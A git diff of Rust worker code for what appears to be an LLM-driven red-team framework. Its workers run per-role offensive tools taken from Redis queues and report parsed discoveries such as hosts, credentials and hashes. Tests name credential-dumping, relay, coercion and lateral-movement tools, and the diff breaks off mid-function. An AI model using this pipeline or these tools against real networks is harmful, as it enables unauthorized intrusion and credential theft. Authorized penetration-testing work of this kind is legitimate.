+    fn task_result_success() {
+        let r = TaskResult::success(
+            "t1",
+            serde_json::json!({"output": "done"}),
+            "pod-0",
+            "ares-recon",
+        );
+        assert!(r.success);
+        assert!(r.error.is_none());
+        assert!(r.result.is_some());
+        assert!(r.completed_at.is_some());
+        assert_eq!(r.worker_pod.as_deref(), Some("pod-0"));
+    }
+
+    #[test]
+    fn task_result_failure() {
+        let r = TaskResult::failure("t1", "timeout".into(), None, "pod-0", "ares-recon");
+        assert!(!r.success);
+        assert_eq!(r.error.as_deref(), Some("timeout"));
+        assert!(r.result.is_none());
+    }
+
+    #[test]
+    fn task_result_skip_serializing_none() {
+        let r = TaskResult::success("t1", serde_json::json!("ok"), "pod", "agent");
+        let json = serde_json::to_string(&r).unwrap();
+        // error field should be absent (skip_serializing_if = "Option::is_none")
+        assert!(!json.contains("\"error\""));
+    }
+
+    #[test]
+    fn redis_key_prefixes() {
+        assert_eq!(TASK_QUEUE_PREFIX, "ares:tasks");
+        assert_eq!(RESULT_QUEUE_PREFIX, "ares:results");
+        assert_eq!(TASK_STATUS_PREFIX, "ares:task_status");
+    }
+}
diff --git a/ares-cli/src/worker/task_loop/result_handler.rs b/ares-cli/src/worker/task_loop/result_handler.rs
new file mode 100644
index 00000000..a185d89d
--- /dev/null
+++ b/ares-cli/src/worker/task_loop/result_handler.rs
@@ -0,0 +1,215 @@
+//! Result processing — build TaskResult, push to Redis, track token usage.
+
+use chrono::Utc;
+use redis::AsyncCommands;
+use tracing::{debug, error, info, warn};
+
+use ares_core::token_usage;
+
+use crate::worker::config::WorkerConfig;
+
+use super::executor::run_agent_task;
+use super::types::{TaskMessage, TaskResult};
+use super::{RESULT_QUEUE_PREFIX, RESULT_TTL, TASK_STATUS_PREFIX, TASK_STATUS_TTL};
+
+/// Process a single task: set status, run agent, push result.
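+///
+/// Sketch of the Redis keys touched for a task id `t-1` (illustrative;
+/// prefixes and TTLs per the constants in `mod.rs`):
+///
+/// ```text
+/// ares:task_status:t-1  SETEX  {"status": "running", ...}              TTL 24h
+/// ares:results:t-1      LPUSH  serialized TaskResult, then EXPIRE      TTL 24h
+/// ares:task_status:t-1  SETEX  {"status": "completed" | "failed", ...}
+/// ```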
+pub async fn process_task( + conn: &mut redis::aio::ConnectionManager, + config: &WorkerConfig, + task: &TaskMessage, +) { + let started_at = Utc::now().to_rfc3339(); + + info!( + task_id = %task.task_id, + task_type = %task.task_type, + agent = %config.agent_name, + "Processing task" + ); + + // 1. Set task status to "running" + if let Err(e) = set_task_status( + conn, + &task.task_id, + "running", + &serde_json::json!({ + "operation_id": config.operation_id, + "role": config.worker_role, + "agent_name": config.agent_name, + "pod_name": config.pod_name, + "task_type": task.task_type, + "payload": task.payload, + "started_at": started_at, + }), + ) + .await + { + warn!(task_id = %task.task_id, "Failed to set task status to running: {e}"); + } + + // 2. Run the agent task + let agent_result = run_agent_task(&task.task_type, &task.payload, config.task_timeout).await; + + // 3. Extract token usage before consuming agent_result (for Redis tracking) + let usage_for_tracking = agent_result.as_ref().ok().and_then(|ar| ar.usage.clone()); + + // 4. Build the result + let (task_result, final_status) = match agent_result { + Ok(ar) => { + if let Some(ref err) = ar.error { + // Agent returned an error (e.g., unsupported task, max steps, model refusal) + let result_payload = serde_json::json!({ + "output": ar.output, + "task_type": task.task_type, + }); + ( + TaskResult::failure( + &task.task_id, + err.clone(), + Some(result_payload), + &config.pod_name, + &config.agent_name, + ), + "failed", + ) + } else { + let mut result_payload = serde_json::json!({ + "output": ar.output, + "task_type": task.task_type, + }); + // Include usage metrics if available + if let Some(ref usage) = ar.usage { + result_payload["usage"] = serde_json::to_value(usage).unwrap_or_default(); + } + // Include structured discoveries parsed from tool output + if let Some(ref disc) = ar.discoveries { + if let Some(obj) = disc.as_object() { + for (k, v) in obj { + result_payload[k] = v.clone(); + } + } + } + ( + TaskResult::success( + &task.task_id, + result_payload, + &config.pod_name, + &config.agent_name, + ), + "completed", + ) + } + } + Err(e) => { + let error_msg = format!("{e}"); + error!( + task_id = %task.task_id, + "Agent task failed: {error_msg}" + ); + ( + TaskResult::failure( + &task.task_id, + error_msg, + None, + &config.pod_name, + &config.agent_name, + ), + "failed", + ) + } + }; + + // 5. Accumulate token usage to Redis (best-effort, never fails the task) + if let Some(ref usage) = usage_for_tracking { + if usage.total_tokens > 0 { + if let Some(ref op_id) = config.operation_id { + let model = usage.model.as_deref().unwrap_or(""); + if let Err(e) = token_usage::increment_token_usage( + conn, + op_id, + usage.input_tokens, + usage.output_tokens, + model, + ) + .await + { + debug!(task_id = %task.task_id, "Failed to increment token usage: {e}"); + } + } + } + } + + // 6. LPUSH result to ares:results:{task_id} + let result_key = format!("{RESULT_QUEUE_PREFIX}:{}", task.task_id); + match serde_json::to_string(&task_result) { + Ok(result_json) => { + if let Err(e) = push_result(conn, &result_key, &result_json).await { + error!(task_id = %task.task_id, "Failed to push result: {e}"); + } + } + Err(e) => { + error!(task_id = %task.task_id, "Failed to serialize result: {e}"); + } + } + + // 7. 
Update task status to final state
+    if let Err(e) = set_task_status(
+        conn,
+        &task.task_id,
+        final_status,
+        &serde_json::json!({
+            "operation_id": config.operation_id,
+            "role": config.worker_role,
+            "agent_name": config.agent_name,
+            "pod_name": config.pod_name,
+            "task_type": task.task_type,
+            "ended_at": Utc::now().to_rfc3339(),
+        }),
+    )
+    .await
+    {
+        warn!(task_id = %task.task_id, "Failed to set task status to {final_status}: {e}");
+    }
+
+    match final_status {
+        "completed" => info!(task_id = %task.task_id, "Task completed"),
+        _ => warn!(task_id = %task.task_id, "Task failed"),
+    }
+}
+
+/// Push a result to the result queue and set TTL.
+async fn push_result(
+    conn: &mut redis::aio::ConnectionManager,
+    result_key: &str,
+    result_json: &str,
+) -> anyhow::Result<()> {
+    conn.lpush::<_, _, ()>(result_key, result_json).await?;
+    conn.expire::<_, ()>(result_key, RESULT_TTL).await?;
+    Ok(())
+}
+
+/// Set task status in Redis with TTL.
+/// Matches Python's `set_task_status` — writes JSON to `ares:task_status:{task_id}`.
+async fn set_task_status(
+    conn: &mut redis::aio::ConnectionManager,
+    task_id: &str,
+    status: &str,
+    extra_fields: &serde_json::Value,
+) -> anyhow::Result<()> {
+    let key = format!("{TASK_STATUS_PREFIX}:{task_id}");
+    let mut data = extra_fields.clone();
+    if let Some(obj) = data.as_object_mut() {
+        obj.insert(
+            "status".to_string(),
+            serde_json::Value::String(status.to_string()),
+        );
+        obj.insert(
+            "updated_at".to_string(),
+            serde_json::Value::String(Utc::now().to_rfc3339()),
+        );
+    }
+    let json_str = serde_json::to_string(&data)?;
+    conn.set_ex::<_, _, ()>(&key, &json_str, TASK_STATUS_TTL as u64)
+        .await?;
+    Ok(())
+}
diff --git a/ares-cli/src/worker/task_loop/types.rs b/ares-cli/src/worker/task_loop/types.rs
new file mode 100644
index 00000000..4e5282b8
--- /dev/null
+++ b/ares-cli/src/worker/task_loop/types.rs
@@ -0,0 +1,180 @@
+//! Wire types and agent result structs for the task loop.
+
+use chrono::Utc;
+use serde::{Deserialize, Serialize};
+
+// ─── Agent result types ──────────────────────────────────────────────────────
+
+/// Result from running an agent task.
+#[derive(Debug, Clone)]
+pub struct AgentResult {
+    /// Raw text output from the agent.
+    pub output: String,
+    /// Whether the agent encountered an error.
+    pub error: Option<String>,
+    /// Token usage metrics from the LLM call.
+    pub usage: Option<TokenUsage>,
+    /// Structured discoveries parsed from tool output (hosts, creds, hashes, vulns).
+    pub discoveries: Option<serde_json::Value>,
+}
+
+/// LLM token usage counters.
+#[derive(Debug, Clone, serde::Serialize)]
+pub struct TokenUsage {
+    pub input_tokens: u64,
+    pub output_tokens: u64,
+    pub total_tokens: u64,
+    /// Model name (e.g. "openai/gpt-4.1-mini").
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub model: Option<String>,
+}
+
+// ─── Wire types (match Python's Pydantic models exactly) ─────────────────────
+
+/// Task message from the queue. Matches `TaskMessage` in `task_queue.py`.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct TaskMessage {
+    pub task_id: String,
+    pub task_type: String,
+    pub source_agent: String,
+    pub target_agent: String,
+    pub payload: serde_json::Value,
+    #[serde(default = "default_priority")]
+    pub priority: i32,
+    pub created_at: Option<String>,
+    pub callback_queue: Option<String>,
+}
+
+fn default_priority() -> i32 {
+    5
+}
+
+/// Task result pushed back to orchestrator. Matches `TaskResult` in `task_queue.py`.
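+///
+/// Serialized success form, as a sketch (values invented; `result`, `error`,
+/// `worker_pod`, and `agent_name` are skipped entirely when `None`):
+///
+/// ```text
+/// {"task_id": "t-1", "success": true, "result": {"output": "done"},
+///  "completed_at": "2026-04-08T12:00:00Z", "worker_pod": "pod-0", "agent_name": "recon"}
+/// ```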
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct TaskResult {
+    pub task_id: String,
+    pub success: bool,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub result: Option<serde_json::Value>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub error: Option<String>,
+    pub completed_at: Option<String>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub worker_pod: Option<String>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub agent_name: Option<String>,
+}
+
+impl TaskResult {
+    pub fn success(
+        task_id: &str,
+        result: serde_json::Value,
+        pod_name: &str,
+        agent_name: &str,
+    ) -> Self {
+        Self {
+            task_id: task_id.to_string(),
+            success: true,
+            result: Some(result),
+            error: None,
+            completed_at: Some(Utc::now().to_rfc3339()),
+            worker_pod: Some(pod_name.to_string()),
+            agent_name: Some(agent_name.to_string()),
+        }
+    }
+
+    pub fn failure(
+        task_id: &str,
+        error: String,
+        result: Option<serde_json::Value>,
+        pod_name: &str,
+        agent_name: &str,
+    ) -> Self {
+        Self {
+            task_id: task_id.to_string(),
+            success: false,
+            result,
+            error: Some(error),
+            completed_at: Some(Utc::now().to_rfc3339()),
+            worker_pod: Some(pod_name.to_string()),
+            agent_name: Some(agent_name.to_string()),
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+
+    #[test]
+    fn test_task_result_success() {
+        let result = TaskResult::success("task-1", json!({"output": "done"}), "pod-1", "recon");
+        assert!(result.success);
+        assert!(result.error.is_none());
+        assert_eq!(result.task_id, "task-1");
+        assert!(result.result.is_some());
+        assert_eq!(result.worker_pod.as_deref(), Some("pod-1"));
+        assert_eq!(result.agent_name.as_deref(), Some("recon"));
+        assert!(result.completed_at.is_some());
+    }
+
+    #[test]
+    fn test_task_result_failure() {
+        let result = TaskResult::failure(
+            "task-2",
+            "timeout".to_string(),
+            Some(json!({"partial": true})),
+            "pod-1",
+            "lateral",
+        );
+        assert!(!result.success);
+        assert_eq!(result.error.as_deref(), Some("timeout"));
+        assert!(result.result.is_some());
+    }
+
+    #[test]
+    fn test_task_result_failure_no_result() {
+        let result = TaskResult::failure("task-3", "crash".to_string(), None, "pod-1", "recon");
+        assert!(!result.success);
+        assert!(result.result.is_none());
+    }
+
+    #[test]
+    fn test_task_message_deserialize() {
+        let json = json!({
+            "task_id": "t-1",
+            "task_type": "recon",
+            "source_agent": "orchestrator",
+            "target_agent": "recon-1",
+            "payload": {"target_ip": "192.168.58.10"},
+            "priority": 3,
+            "created_at": "2026-04-08T12:00:00Z"
+        });
+        let msg: TaskMessage = serde_json::from_value(json).unwrap();
+        assert_eq!(msg.task_id, "t-1");
+        assert_eq!(msg.task_type, "recon");
+        assert_eq!(msg.priority, 3);
+        assert!(msg.callback_queue.is_none());
+    }
+
+    #[test]
+    fn test_task_message_default_priority() {
+        let json = json!({
+            "task_id": "t-1",
+            "task_type": "recon",
+            "source_agent": "orchestrator",
+            "target_agent": "recon-1",
+            "payload": {}
+        });
+        let msg: TaskMessage = serde_json::from_value(json).unwrap();
+        assert_eq!(msg.priority, 5); // default
+    }
+
+    #[test]
+    fn test_task_result_serialization_skips_none() {
+        let result = TaskResult::success("t-1", json!({"ok": true}), "pod-1", "recon");
+        let serialized = serde_json::to_value(&result).unwrap();
+        assert!(serialized.get("error").is_none());
+    }
+}
diff --git a/ares-cli/src/worker/tool_check.rs b/ares-cli/src/worker/tool_check.rs
new file mode 100644
index 00000000..52eb9c9b
--- /dev/null
+++ b/ares-cli/src/worker/tool_check.rs
@@ -0,0 +1,273 @@
+//! Tool availability check at worker startup.
+//!
+//! Probes which external binaries are installed so we can log warnings
+//! for missing tools and optionally report the inventory to the orchestrator
+//! via Redis.
+//!
+//! Tool lists are generated at compile time from `tools.yaml` by
+//! `build.rs`. See that file for the authoritative reference of expected
+//! tools per role.
+
+use std::collections::BTreeMap;
+
+use tracing::{info, warn};
+
+// Pull in `WORKER_ROLES` and `tools_for_role()` generated by build.rs
+// from tools.yaml.
+include!(concat!(env!("OUT_DIR"), "/tool_tables.rs"));
+
+/// Check which tools are available in $PATH for the given role.
+///
+/// Returns a map of tool_name → available (true/false).
+/// Logs warnings for missing tools but does not fail.
+pub async fn check_tools(role: &str) -> BTreeMap<String, bool> {
+    let tools = tools_for_role(role);
+    let mut inventory = BTreeMap::new();
+
+    for &tool in tools {
+        let available = is_in_path(tool).await;
+        inventory.insert(tool.to_string(), available);
+    }
+
+    let available: Vec<&str> = inventory
+        .iter()
+        .filter(|(_, &v)| v)
+        .map(|(k, _)| k.as_str())
+        .collect();
+    let missing: Vec<&str> = inventory
+        .iter()
+        .filter(|(_, &v)| !v)
+        .map(|(k, _)| k.as_str())
+        .collect();
+
+    info!(
+        role = role,
+        available_count = available.len(),
+        missing_count = missing.len(),
+        "Tool availability check complete"
+    );
+
+    if !missing.is_empty() {
+        warn!(
+            role = role,
+            missing = ?missing,
+            "Some tools are not installed — tasks requiring them will fail"
+        );
+    }
+
+    inventory
+}
+
+/// Publish tool inventory to Redis so the orchestrator can see what
+/// each worker has available.
+pub async fn publish_inventory(
+    conn: &mut redis::aio::ConnectionManager,
+    agent_name: &str,
+    inventory: &BTreeMap<String, bool>,
+) {
+    use redis::AsyncCommands;
+
+    let key = format!("ares:tools:{agent_name}");
+    let available: Vec<&str> = inventory
+        .iter()
+        .filter(|(_, &v)| v)
+        .map(|(k, _)| k.as_str())
+        .collect();
+
+    match serde_json::to_string(&available) {
+        Ok(json) => {
+            let result: Result<(), _> = conn.set_ex(&key, &json, 3600).await;
+            if let Err(e) = result {
+                warn!("Failed to publish tool inventory: {e}");
+            }
+        }
+        Err(e) => warn!("Failed to serialize tool inventory: {e}"),
+    }
+}
+
+/// Check if a binary is available in PATH using `which`.
+async fn is_in_path(binary: &str) -> bool {
+    tokio::process::Command::new("which")
+        .arg(binary)
+        .stdout(std::process::Stdio::null())
+        .stderr(std::process::Stdio::null())
+        .status()
+        .await
+        .is_ok_and(|s| s.success())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    /// All known worker roles must have a non-empty tool list.
+    #[test]
+    fn all_roles_have_tools() {
+        for role in WORKER_ROLES {
+            let tools = tools_for_role(role);
+            assert!(!tools.is_empty(), "Role {role} should have tools");
+        }
+    }
+
+    #[test]
+    fn unknown_role_returns_empty() {
+        assert!(tools_for_role("nonexistent").is_empty());
+    }
+
+    /// No duplicate entries within a single role's tool list.
+    #[test]
+    fn no_duplicate_tools_per_role() {
+        for role in WORKER_ROLES {
+            let tools = tools_for_role(role);
+            let mut seen = std::collections::HashSet::new();
+            for tool in tools {
+                assert!(
+                    seen.insert(tool),
+                    "Duplicate tool '{tool}' in role '{role}'"
+                );
+            }
+        }
+    }
+
+    // ---------------------------------------------------------------
+    // Per-role expected tool assertions.
+    //
+    // These validate that tools.yaml contains the expected tools.
+    // When Ansible provisioning changes, update tools.yaml.
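+    //
+    // As a sketch only (build.rs and tools.yaml are authoritative, and the
+    // exact generated code is an assumption), the lookup behaves like:
+    //
+    //   pub fn tools_for_role(role: &str) -> &'static [&'static str] {
+    //       match role {
+    //           "cracker" => &["hashcat", "john", /* ... */],
+    //           _ => &[],
+    //       }
+    //   }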
+ // --------------------------------------------------------------- + + #[test] + fn recon_has_expected_tools() { + let tools = tools_for_role("recon"); + for expected in &[ + "nmap", + "netexec", + "bloodhound-python", + "ldapsearch", + "enum4linux", + "certipy", + "impacket-GetNPUsers", + "impacket-GetUserSPNs", + ] { + assert!( + tools.contains(expected), + "recon missing expected tool: {expected}" + ); + } + } + + #[test] + fn credential_access_has_expected_tools() { + let tools = tools_for_role("credential_access"); + for expected in &[ + "impacket-GetUserSPNs", + "impacket-GetNPUsers", + "impacket-secretsdump", + "lsassy", + "smbclient", + "gMSADumper", + ] { + assert!( + tools.contains(expected), + "credential_access missing expected tool: {expected}" + ); + } + // netexec is NOT installed on credential_access (only on RECON) + assert!( + !tools.contains(&"netexec"), + "credential_access must NOT have netexec (recon-only)" + ); + } + + #[test] + fn cracker_has_expected_tools() { + let tools = tools_for_role("cracker"); + assert!(tools.contains(&"hashcat")); + assert!(tools.contains(&"john")); + } + + #[test] + fn acl_has_expected_tools() { + let tools = tools_for_role("acl"); + for expected in &["bloodyAD", "pywhisker", "impacket-dacledit", "rpcclient"] { + assert!( + tools.contains(expected), + "acl missing expected tool: {expected}" + ); + } + } + + #[test] + fn privesc_has_expected_tools() { + let tools = tools_for_role("privesc"); + for expected in &[ + "certipy", + "lsassy", + "nopac", + "printnightmare", + "printerbug", + "addspn", + "dnstool", + "impacket-findDelegation", + "impacket-getST", + "impacket-ticketer", + "impacket-secretsdump", + "impacket-psexec", + "KrbRelayUp", + ] { + assert!( + tools.contains(expected), + "privesc missing expected tool: {expected}" + ); + } + } + + #[test] + fn lateral_has_expected_tools() { + let tools = tools_for_role("lateral"); + for expected in &[ + "evil-winrm", + "impacket-psexec", + "impacket-wmiexec", + "impacket-smbexec", + "impacket-secretsdump", + "xfreerdp", + "sshpass", + "proxychains4", + "pth-winexe", + ] { + assert!( + tools.contains(expected), + "lateral missing expected tool: {expected}" + ); + } + } + + #[test] + fn coercion_has_expected_tools() { + let tools = tools_for_role("coercion"); + for expected in &[ + "responder", + "mitm6", + "coercer", + "dfscoerce", + "printerbug", + "addspn", + "dnstool", + "impacket-ntlmrelayx", + ] { + assert!( + tools.contains(expected), + "coercion missing expected tool: {expected}" + ); + } + } + + #[tokio::test] + async fn which_finds_basic_commands() { + // `which` itself should always be available + assert!(is_in_path("which").await); + // A nonsense binary should not be found + assert!(!is_in_path("nonexistent_binary_xyz_12345").await); + } +} diff --git a/ares-cli/src/worker/tool_executor.rs b/ares-cli/src/worker/tool_executor.rs new file mode 100644 index 00000000..9864636c --- /dev/null +++ b/ares-cli/src/worker/tool_executor.rs @@ -0,0 +1,452 @@ +//! Thin tool executor loop for LLM-driven orchestration. +//! +//! When the Rust orchestrator drives agent loops via `ARES_LLM_MODEL`, it +//! dispatches individual tool calls to `ares:tool_exec:{role}` and waits +//! for results on `ares:tool_results:{call_id}`. +//! +//! This module implements the worker-side consumer: +//! +//! ```text +//! loop { +//! 1. BRPOP from ares:tool_exec:{role} +//! 2. Deserialize ToolExecRequest +//! 3. Execute tool via ares_tools::dispatch() +//! 4. Serialize ToolExecResponse +//! 5. 
LPUSH to ares:tool_results:{call_id}
+//! }
+//! ```
+//!
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use redis::AsyncCommands;
+use serde::{Deserialize, Serialize};
+use tracing::{debug, error, info, warn, Instrument};
+
+use ares_core::telemetry::propagation::set_span_parent;
+use ares_core::telemetry::spans::{trace_discovery, AgentSpanBuilder, SpanKind, Team};
+use ares_core::telemetry::target::{extract_target_info, infer_target_type_from_info};
+
+use crate::worker::config::WorkerConfig;
+use crate::worker::heartbeat::WorkerStatus;
+
+// ─── Redis key prefixes (must match orchestrator's tool_dispatcher.rs) ───────
+
+const TOOL_EXEC_PREFIX: &str = "ares:tool_exec";
+const TOOL_RESULT_PREFIX: &str = "ares:tool_results";
+
+/// TTL for result keys (1 hour) — matches orchestrator's RESULT_TTL_SECS.
+const RESULT_TTL: i64 = 3600;
+
+// ─── Wire types (match orchestrator's tool_dispatcher.rs exactly) ────────────
+
+/// Request from the orchestrator's RedisToolDispatcher.
+#[derive(Debug, Deserialize)]
+struct ToolExecRequest {
+    call_id: String,
+    task_id: String,
+    tool_name: String,
+    arguments: serde_json::Value,
+    /// W3C traceparent header for cross-service span linking.
+    #[serde(default)]
+    traceparent: Option<String>,
+    /// Operation ID for span correlation with dashboards.
+    #[serde(default)]
+    operation_id: Option<String>,
+}
+
+/// Response pushed back to the orchestrator.
+#[derive(Debug, Serialize)]
+struct ToolExecResponse {
+    call_id: String,
+    output: String,
+    error: Option<String>,
+    /// Structured discoveries parsed from the tool output.
+    #[serde(skip_serializing_if = "Option::is_none")]
+    discoveries: Option<serde_json::Value>,
+}
+
+// ─── Tool executor loop ─────────────────────────────────────────────────────
+
+/// Run the tool execution loop until shutdown is signalled.
+///
+/// Consumes individual tool call requests from `ares:tool_exec:{role}` and
+/// dispatches them directly to `ares_tools::dispatch()`. Results are pushed
+/// back to the per-call mailbox `ares:tool_results:{call_id}`.
+pub async fn run_tool_exec_loop(
+    config: &WorkerConfig,
+    conn: redis::aio::ConnectionManager,
+    status_tx: tokio::sync::watch::Sender<WorkerStatus>,
+    shutdown: Arc<tokio::sync::Notify>,
+) -> anyhow::Result<()> {
+    let queue_key = format!("{TOOL_EXEC_PREFIX}:{}", config.worker_role);
+    info!(
+        queue = %queue_key,
+        agent = %config.agent_name,
+        "Starting tool executor loop"
+    );
+
+    let mut conn = conn;
+
+    // Track tools that failed with "not installed" so we can short-circuit
+    // future calls immediately without attempting to spawn the binary.
+    let mut unavailable_tools: std::collections::HashSet<String> = std::collections::HashSet::new();
+
+    // Exponential backoff state for connection errors
+    let mut retry_delay = Duration::from_secs(1);
+    let max_retry_delay = Duration::from_secs(60);
+
+    loop {
+        // Check for shutdown via select with zero-timeout
+        let poll_result = tokio::select! {
+            result = poll_tool_request(&mut conn, &queue_key, config.poll_timeout) => result,
+            _ = shutdown.notified() => {
+                info!("Tool executor: shutdown signalled, finishing");
+                return Ok(());
+            }
+        };
+
+        match poll_result {
+            Ok(Some(request)) => {
+                retry_delay = Duration::from_secs(1);
+
+                // Update heartbeat to busy
+                let _ = status_tx.send(WorkerStatus {
+                    status: "busy".to_string(),
+                    current_task: Some(format!("{}:{}", request.tool_name, request.call_id)),
+                });
+
+                let ti = extract_target_info(&request.arguments);
+                let tt = infer_target_type_from_info(&ti);
+                let mut span_builder =
+                    AgentSpanBuilder::new("tool_exec", &config.worker_role, Team::Red)
+                        .tool(&request.tool_name)
+                        .kind(SpanKind::Consumer);
+                if let Some(ref ip) = ti.target_ip {
+                    span_builder = span_builder.target_ip(ip);
+                }
+                if let Some(ref fqdn) = ti.target_fqdn {
+                    span_builder = span_builder.target_fqdn(fqdn);
+                }
+                if let Some(ref user) = ti.target_user {
+                    span_builder = span_builder.target_user(user);
+                }
+                if let Some(target_type) = tt {
+                    span_builder = span_builder.target_type(target_type);
+                }
+                if let Some(ref op) = request.operation_id {
+                    span_builder = span_builder.operation_id(op);
+                }
+                let exec_span = span_builder.build();
+                if let Some(ref tp) = request.traceparent {
+                    set_span_parent(&exec_span, tp);
+                }
+                execute_and_respond(&mut conn, &request, &mut unavailable_tools)
+                    .instrument(exec_span)
+                    .await;
+
+                // Back to idle
+                let _ = status_tx.send(WorkerStatus {
+                    status: "idle".to_string(),
+                    current_task: None,
+                });
+            }
+            Ok(None) => {
+                // BRPOP timeout, no request — just loop
+                retry_delay = Duration::from_secs(1);
+            }
+            Err(e) => {
+                let error_str = e.to_string().to_lowercase();
+                let is_conn_error = [
+                    "connection",
+                    "connect",
+                    "closed",
+                    "timeout",
+                    "broken pipe",
+                    "reset",
+                ]
+                .iter()
+                .any(|kw| error_str.contains(kw));
+
+                if is_conn_error {
+                    // ConnectionManager auto-reconnects; just back off before retrying
+                    warn!(
+                        delay_secs = retry_delay.as_secs(),
+                        "Tool executor: connection error, retrying: {e}"
+                    );
+                    tokio::select! {
+                        _ = tokio::time::sleep(retry_delay) => {}
+                        _ = shutdown.notified() => return Ok(()),
+                    }
+                    retry_delay = (retry_delay * 2).min(max_retry_delay);
+                } else {
+                    error!("Tool executor: non-connection error: {e}");
+                    tokio::select! {
+                        _ = tokio::time::sleep(Duration::from_secs(5)) => {}
+                        _ = shutdown.notified() => return Ok(()),
+                    }
+                    retry_delay = Duration::from_secs(1);
+                }
+            }
+        }
+    }
+}
+
+/// BRPOP a single tool execution request from the queue.
+async fn poll_tool_request(
+    conn: &mut redis::aio::ConnectionManager,
+    queue_key: &str,
+    timeout: Duration,
+) -> anyhow::Result<Option<ToolExecRequest>> {
+    let result: Option<(String, String)> = redis::cmd("BRPOP")
+        .arg(queue_key)
+        .arg(timeout.as_secs() as i64)
+        .query_async(conn)
+        .await?;
+
+    match result {
+        Some((_key, data)) => {
+            let request: ToolExecRequest = serde_json::from_str(&data)?;
+            debug!(
+                tool = %request.tool_name,
+                call_id = %request.call_id,
+                task_id = %request.task_id,
+                "Received tool exec request"
+            );
+            Ok(Some(request))
+        }
+        None => Ok(None),
+    }
+}
+
+/// Execute a tool call and push the result to Redis.
+///
+/// If the tool has previously failed with "not installed", short-circuits
+/// immediately without attempting to spawn the binary.
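+///
+/// The short-circuit reply uses the same wire shape as a normal result; a
+/// minimal sketch (values illustrative):
+///
+/// ```text
+/// {"call_id": "x", "output": "", "error": "Tool 'x' is not installed on this worker. ..."}
+/// ```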
+async fn execute_and_respond(
+    conn: &mut redis::aio::ConnectionManager,
+    request: &ToolExecRequest,
+    unavailable_tools: &mut std::collections::HashSet<String>,
+) {
+    // Short-circuit if this tool is known to be unavailable
+    if unavailable_tools.contains(&request.tool_name) {
+        debug!(
+            tool = %request.tool_name,
+            call_id = %request.call_id,
+            "Skipping unavailable tool (previously failed to spawn)"
+        );
+        let response = ToolExecResponse {
+            call_id: request.call_id.clone(),
+            output: String::new(),
+            error: Some(format!(
+                "Tool '{}' is not installed on this worker. \
+                 Do not call this tool again — it failed to spawn previously.",
+                request.tool_name
+            )),
+            discoveries: None,
+        };
+        let result_key = format!("{TOOL_RESULT_PREFIX}:{}", request.call_id);
+        if let Ok(json) = serde_json::to_string(&response) {
+            let _ = push_result(conn, &result_key, &json).await;
+        }
+        return;
+    }
+
+    info!(
+        tool = %request.tool_name,
+        call_id = %request.call_id,
+        task_id = %request.task_id,
+        "Executing tool"
+    );
+
+    let di = extract_target_info(&request.arguments);
+    let dt = infer_target_type_from_info(&di);
+
+    let response = match ares_tools::dispatch(&request.tool_name, &request.arguments).await {
+        Ok(output) => {
+            // Raw output for structured parsers (need unfiltered data)
+            let raw = output.combined_raw();
+            // Filtered output for LLM (strips MOTD, noise, etc.)
+            let combined = output.combined();
+            let error = if output.success {
+                None
+            } else {
+                Some(format!("tool exited with code {:?}", output.exit_code))
+            };
+
+            // Parse structured discoveries from raw (unfiltered) tool output
+            let discoveries = ares_tools::parsers::parse_tool_output(
+                &request.tool_name,
+                &raw,
+                &request.arguments,
+            );
+            let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) {
+                None
+            } else {
+                Some(discoveries)
+            };
+
+            // Emit discovery spans for observability
+            if let Some(ref disc) = discoveries {
+                if let Some(obj) = disc.as_object() {
+                    for (disc_type, items) in obj {
+                        let count = items.as_array().map(|a| a.len()).unwrap_or(0);
+                        if count > 0 {
+                            let span = trace_discovery(
+                                disc_type,
+                                &request.tool_name,
+                                di.target_user.as_deref(),
+                                None,
+                                di.target_ip.as_deref(),
+                                di.target_fqdn.as_deref(),
+                                dt,
+                                request.operation_id.as_deref(),
+                            );
+                            let _guard = span.enter();
+                        }
+                    }
+                }
+            }
+
+            ToolExecResponse {
+                call_id: request.call_id.clone(),
+                output: combined,
+                error,
+                discoveries,
+            }
+        }
+        Err(e) => {
+            let err_str = e.to_string();
+            // Track tools that fail because the binary is missing
+            if err_str.contains("failed to spawn") || err_str.contains("not installed") {
+                warn!(
+                    tool = %request.tool_name,
+                    "Tool binary not found — marking as unavailable for this session"
+                );
+                unavailable_tools.insert(request.tool_name.clone());
+            }
+            warn!(
+                tool = %request.tool_name,
+                call_id = %request.call_id,
+                err = %e,
+                "Tool execution failed"
+            );
+            ToolExecResponse {
+                call_id: request.call_id.clone(),
+                output: String::new(),
+                error: Some(err_str),
+                discoveries: None,
+            }
+        }
+    };
+
+    let has_error = response.error.is_some();
+    let result_key = format!("{TOOL_RESULT_PREFIX}:{}", request.call_id);
+
+    match serde_json::to_string(&response) {
+        Ok(json) => {
+            if let Err(e) = push_result(conn, &result_key, &json).await {
+                error!(
+                    call_id = %request.call_id,
+                    "Failed to push tool result: {e}"
+                );
+            } else {
+                debug!(
+                    tool = %request.tool_name,
+                    call_id = %request.call_id,
+                    has_error = has_error,
+                    "Tool result pushed"
+                );
+            }
+        }
+        Err(e) => {
+            error!(
+                call_id =
